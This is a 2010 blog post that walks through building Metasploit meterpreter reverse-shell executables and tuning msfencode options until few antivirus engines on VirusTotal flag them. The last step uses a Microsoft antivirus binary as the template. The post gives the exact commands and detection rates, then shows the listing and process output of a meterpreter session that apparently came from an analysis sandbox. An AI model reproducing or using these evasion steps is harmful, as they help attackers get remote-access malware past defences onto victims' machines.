Tuesday, March 30, 2010

metasploit vs virustotal

A few days back i saw a post (http://practicalexploitation.com/post/417194846/rob-could-you-cover-anti-virus-evasion-i-was-going) on tactical exploitation from jeffhnet, asking for help on bypassing AVGs. Trying to do the same I've started with metasploit's meterpreter and the usual attempts to bypass AVG.

First attempt, got a high rate of red flags, on virustotal and novirusthanks, around 35% to 40%. The command that i had used were:

./msfpayload windows/meterpreter/reverse_
tcp LHOST=myhost raw | ./msfencode -b '' -t exe -o test1.exe

I changed the encoder and i got some slightly better results with:

./msfpayload windows/meterpreter/reverse_tcp LHOST=myhost raw | ./msfencode -b '' -e x86/call4_dword_xor -t exe -o test2-0.exe

Finally i ended with

./msfpayload windows/meterpreter/reverse_tcp LHOST=myhost raw | ./msfencode -b '' -c 5 -e x86/call4_dword_xor -x msseces.exe -t exe -o test2-5-mss.exe

Msseces.exe is the Microsoft antivirus and i used it as template for the msfencode. It produced a nice big exe that was almost undetectable. Actually 3 hits in novirusthanks and Result: 5/41 (12.2%) on virustotal ( MD5...: ca904e0c8ac8ec6e34b85f5c1c9b36bb ) . Roughly good results the only thing that was bothering me was that the file is being detected by Microsoft NOD32 and Symantec, but i settle to give it another try the next day.

So i fired up today msfconsole and multi handler to be ready to test my exe files, as i was going to scramble them with some commercial packers/encryptors/protectors. As i was going through a list of protectors to start i saw a strange connection to my console

[*] Started reverse handler on myhost:4444
[*] Starting the payload handler...

[*] Sending stage (747008 bytes)
[*] Meterpreter session 1 opened (myhost:4444 -> 67.124.xx.xx:47364)

I did immediately an ls and i saw the following

meterpreter > ls

Listing: C:\
============

Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100777/rwxrwxrwx 1048392 fil Fri Mar 05 13:39:03 +0200 2010 0B7BBu.exe
100777/rwxrwxrwx 0 fil Sat Oct 14 19:27:15 +0300 2006 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil Sat Oct 14 19:27:15 +0300 2006 CONFIG.SYS
40777/rwxrwxrwx 0 dir Sat Oct 14 19:44:53 +0300 2006 Documents and Settings
100444/r--r--r-- 0 fil Sat Oct 14 19:27:15 +0300 2006 IO.SYS
100444/r--r--r-- 0 fil Sat Oct 14 19:27:15 +0300 2006 MSDOS.SYS
100555/r-xr-xr-x 47564 fil Sat Oct 14 19:49:28 +0300 2006 NTDETECT.COM
40555/r-xr-xr-x 0 dir Tue Aug 12 00:54:21 +0300 2008 Program Files
40777/rwxrwxrwx 0 dir Tue Aug 12 00:12:52 +0300 2008 RECYCLER
40777/rwxrwxrwx 0 dir Wed Nov 22 00:13:02 +0200 2006 System Volume Information
40777/rwxrwxrwx 0 dir Tue Aug 12 00:54:27 +0300 2008 WINDOWS
100666/rw-rw-rw- 202 fil Wed Nov 22 00:15:27 +0200 2006 boot.ini
100444/r--r--r-- 250032 fil Sat Oct 14 19:49:28 +0300 2006 ntldr
100666/rw-rw-rw- 402653184 fil Fri Mar 05 13:38:03 +0200 2010 pagefile.sys
40777/rwxrwxrwx 0 dir Tue Aug 12 00:15:46 +0300 2008 temp

The 0B7BBu.exe was the same size as my file, and the process list:

meterpreter > ps

Process list
============

PID Name Arch User Path
--- ---- ---- ---- ----
0 [System Process]
4 System x86
420 smss.exe x86 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
684 csrss.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
708 winlogon.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
752 services.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
764 lsass.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
920 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
988 svchost.exe x86 C:\WINDOWS\system32\svchost.exe
1108 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1200 svchost.exe x86 C:\WINDOWS\System32\svchost.exe
1336 svchost.exe x86 C:\WINDOWS\System32\svchost.exe
1448 explorer.exe x86 HD8R2JDS87REW82\Administrator C:\WINDOWS\Explorer.EXE
1616 spoolsv.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
1684 msmsgs.exe x86 HD8R2JDS87REW82\Administrator C:\Program Files\Messenger\msmsgs.exe
1828 rundll32.exe x86 HD8R2JDS87REW82\Administrator C:\WINDOWS\system32\rundll32.exe
940 alg.exe x86 C:\WINDOWS\System32\alg.exe
1300 wscntfy.exe x86 HD8R2JDS87REW82\Administrator C:\WINDOWS\system32\wscntfy.exe
1028 cwstart.exe x86 HD8R2JDS87REW82\Administrator C:\analysis\cwstart.exe
1660 cwstart.exe x86 HD8R2JDS87REW82\Administrator C:\analysis\cwstart.exe
1700 popwack.exe x86 HD8R2JDS87REW82\Administrator C:\analysis\popwack.exe
1756 cwstart.exe x86 HD8R2JDS87REW82\Administrator C:\analysis\cwstart.exe
1444 0B7BBu.exe x86 HD8R2JDS87REW82\Administrator C:\0B7BBu.exe
2028 wuauclt.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\wuauclt.exe
2016 wuauclt.exe x86 HD8R2JDS87REW82\Administrator C:\WINDOWS\system32\wuauclt.exe
1820 wmiprvse.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\wbem\wmiprvse.exe


So that's about it, the connection was dropped after that, and in a couple of days my file will be marked from more engines as viral i guess.

Next thing that i'll like to do is to find out from where this connection came. Was it cause the file was on novirusthanks that claims they do not distribute the sample, or from virustotal.

More on part 2
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)